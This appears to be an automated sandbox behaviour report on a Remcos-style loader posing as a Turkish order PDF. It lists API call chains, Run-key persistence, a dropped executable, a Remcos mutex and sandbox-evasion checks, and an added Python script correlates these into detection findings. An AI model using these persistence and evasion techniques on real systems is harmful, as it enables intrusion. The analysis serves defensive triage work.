Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040D4E5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00411700
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00409908
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
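Several lines in this report are host artefacts a responder can hunt for directly: the mutex \Sessions\1\BaseNamedObjects\Remcos-MZPAVR created from the injected C:\Windows\SysWOW64\logagent.exe, the executable dropped to C:\Users\Public\Libraries\Eluiezilfw.exe, the HKCU\...\CurrentVersion\Run value Eluiezilfw that points back at that drop, and the FAILCRITICALERRORS | NOOPENFILEERRORBOX error-mode change. The Python below, added here as an example and not part of the sandbox report or of the sample, parses lines of the "Source: <process> <event>: <detail>" form used above and correlates those events. The Remcos-<tag> mutex pattern, the list of user-writable drop directories and the rule names are heuristics chosen for this example, not facts stated by the report; the SAMPLE_LINES are constructed from the report lines.

```python
"""Correlate sandbox behaviour lines into Remcos/DBatLoader host-artifact findings.

Added example, not part of the sandbox report or of the sample. Parses
"Source: <process> <event>: <detail>" lines and flags: a Remcos-style mutex
(heuristic pattern), an .exe dropped to a user-writable directory, a Run
value whose name matches that drop, and suppressed error dialogs.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Sequence

EVENTS = ("Mutant created", "File created", "Registry value created or modified",
          "Process information set", "File read")
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<event>" + "|".join(re.escape(e) for e in EVENTS)
    + r"): (?P<detail>.+?)(?: Jump to (?:behavior|dropped file))?$")

# Heuristics (assumptions made for this example, not taken from the report).
REMCOS_MUTEX_RE = re.compile(r"^Remcos-[A-Z0-9]{4,}$")
RUN_KEY_RE = re.compile(r"^(?P<key>HKEY_\w+\\.+\\CurrentVersion\\Run(?:Once)?) (?P<value>.+)$", re.I)
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class Event:
    source: str
    kind: str
    detail: str


@dataclass
class Finding:
    rule: str
    source: str
    detail: str


def parse_lines(lines: Sequence[str]) -> List[Event]:
    """Keep the event lines we know how to read; ignore everything else."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(m["src"], m["event"], m["detail"]))
    return events


def _user_writable(path: str) -> bool:
    p = path.lower()
    return p.startswith(USER_WRITABLE) or "\\appdata\\" in p


def triage(events: Sequence[Event]) -> List[Finding]:
    """Two passes: collect dropped executables first, then correlate the rest."""
    findings: List[Finding] = []
    seen = set()

    def add(rule: str, src: str, detail: str) -> None:
        key = (rule, src, detail)
        if key not in seen:            # the report repeats identical events
            seen.add(key)
            findings.append(Finding(rule, src, detail))

    dropped: Dict[str, str] = {}       # lowercase file stem -> full path
    for e in events:
        if e.kind == "File created" and e.detail.lower().endswith(".exe") and _user_writable(e.detail):
            stem = e.detail.rsplit("\\", 1)[-1].rsplit(".", 1)[0].lower()
            dropped[stem] = e.detail
            add("exe_dropped_in_user_writable_dir", e.source, e.detail)

    for e in events:
        if e.kind == "Mutant created":
            name = e.detail.rsplit("\\", 1)[-1]
            if REMCOS_MUTEX_RE.match(name):
                # A RAT mutex owned by a Windows binary is the injection target speaking.
                hosted = e.source.lower().startswith(SYSTEM_DIRS)
                add("remcos_style_mutex_in_windows_binary" if hosted else "remcos_style_mutex",
                    e.source, name)
        elif e.kind == "Registry value created or modified":
            m = RUN_KEY_RE.match(e.detail)
            if m:
                rule = ("run_key_points_at_dropped_exe" if m["value"].strip().lower() in dropped
                        else "run_key_persistence")
                add(rule, e.source, e.detail)
        elif e.kind == "Process information set" and "FAILCRITICALERRORS" in e.detail:
            add("error_dialogs_suppressed", e.source, e.detail)
    return findings


# Constructed from the report lines above (same shape, trimmed to the events used here).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\logagent.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-MZPAVR",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe File created: C:\Users\Public\Libraries\Eluiezilfw.exe Jump to dropped file",
    r"Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Eluiezilfw Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior",
    r"Source: C:\Users\Public\Libraries\Eluiezilfw.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior",
    r"Source: C:\Windows\SysWOW64\logagent.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior",
]

if __name__ == "__main__":
    for f in triage(parse_lines(SAMPLE_LINES)):
        print(f"{f.rule:40} {f.source} :: {f.detail}")
```

The two-pass structure matters: the Run value is only interesting on its own as generic persistence, but once its name is matched against the stem of an executable dropped into a world-writable directory the two lines together describe the loader's install step. The hosts-file read is parsed but produces no finding, since on its own it is not distinctive.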

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\logagent.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\SysWOW64\logagent.exe Code function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_004113C9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh 3_2_00405156
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh 3_2_00405156
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 10546B0Ah 3_2_10546AE5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 10546B0Ah 3_2_10546AE5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00404C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040751B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr 3_2_00410586
